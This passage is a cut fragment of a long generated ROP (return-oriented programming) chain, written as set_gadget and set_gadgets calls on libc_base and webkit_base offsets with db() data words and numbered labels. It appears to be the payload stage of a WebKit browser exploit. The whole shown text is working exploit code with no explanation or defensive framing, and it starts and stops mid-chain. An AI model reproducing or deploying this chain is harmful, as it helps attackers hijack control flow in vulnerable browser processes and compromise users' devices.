set_gadget(libc_base+144605,); //pop rdi
//L754:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+95544, //L757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+95512, //L755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+95528, //L756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L755:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L756:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L757:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+95616, //L759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L759:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+95672, //L760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L760:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+95768, //L763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L762:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L763:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L764:
db([5, 0]); // 0x5
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+95864, //L765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+95880, //L766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L765:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L766:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+95968, //L768
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L768:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+96024, //L769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L769:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+96128, //L771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L771:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L773:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+96248, //L776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+96232, //L774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L774:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L776:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+96392, //L779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+96360, //L777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+96376, //L778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L777:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L778:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L779:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+96464, //L781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L781:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+96520, //L782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L782:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+96616, //L785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L784:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L785:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L786:
db([11, 0]); // 0xb
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+96712, //L787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+96728, //L788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L787:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L788:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+96816, //L790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L790:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+96872, //L791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L791:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+96944, //L794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L794:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+97000, //L795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L795:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L797:
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+97136, //L798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L798:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L800:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+97256, //L803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+97240, //L801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L801:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L803:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+97400, //L806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+97368, //L804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+97384, //L805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L804:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L805:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L806:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+97472, //L808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L808:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+97528, //L809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L809:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+97624, //L812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L811:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L812:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L813:
db([12, 0]); // 0xc
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+97720, //L814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+97736, //L815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L814:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L815:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+97824, //L817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L817:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+97880, //L818
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L818:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+97952, //L821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L821:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+98008, //L822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L822:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L824:
libc_base+428453, //mov rax, rdx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+98144, //L825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L825:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L827:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+98264, //L830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+98248, //L828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L828:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L830:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+98408, //L833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+98376, //L831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+98392, //L832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L831:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L832:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L833:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+98480, //L835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L835:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+98536, //L836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L836:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+98632, //L839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L838:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L839:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L840:
db([13, 0]); // 0xd
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+98728, //L841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+98744, //L842
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L841:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L842:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+98832, //L844
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L844:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+98888, //L845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L845:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+98960, //L848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L848:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+99016, //L849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L849:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L851:
libc_base+764760, //pop rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+99152, //L852
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L852:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L854:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+99272, //L857
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+99256, //L855
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L855:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L857:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+99416, //L860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+99384, //L858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+99400, //L859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L858:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L859:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L860:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+99488, //L862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L862:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+99544, //L863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L863:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+99640, //L866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L865:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L866:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L867:
db([14, 0]); // 0xe
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+99736, //L868
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+99752, //L869
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L868:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L869:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+99840, //L871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L871:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+99896, //L872
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L872:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+99968, //L875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L875:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+100024, //L876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L876:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+100112, //L878
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L878:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L880:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+100232, //L883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+100216, //L881
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L881:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L883:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+100376, //L886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+100344, //L884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+100360, //L885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L884:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L885:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L886:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+100448, //L888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L888:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+100504, //L889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L889:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+100600, //L892
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L891:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L892:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L893:
db([4, 0]); // 0x4
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+100696, //L894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+100712, //L895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L894:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L895:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+100800, //L897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L897:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+100856, //L898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L898:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+100960, //L900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L900:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L902:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+101080, //L905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+101064, //L903
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L903:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L905:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+101224, //L908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+101192, //L906
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+101208, //L907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L906:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L907:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L908:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+101296, //L910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L910:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+101352, //L911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
